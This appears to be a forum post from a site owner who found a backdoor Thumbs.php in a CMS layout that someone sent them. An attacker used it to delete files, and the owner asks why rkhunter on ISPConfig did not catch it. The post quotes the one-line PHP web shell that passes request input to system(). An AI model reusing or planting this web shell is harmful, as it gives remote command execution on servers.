Yesterday someone sent me the layout of the CMS, i upload it to my server, including the layout was a backdoor Thumbs.php file, this file contains:
<pre><body bgcolor=silver><? @system($_REQUEST["v"]); ?></body></pre>
It seems to me that this backdoor exactly:
This person has execute this script by adress.com/layout/layoutname/img/Thumbs.php and removed all the files in that directory.
I have ispconfig 220.127.116.11, why rkhunter did not block this backdoor?
I thought these programs with ispconfig will protect me from the backdoor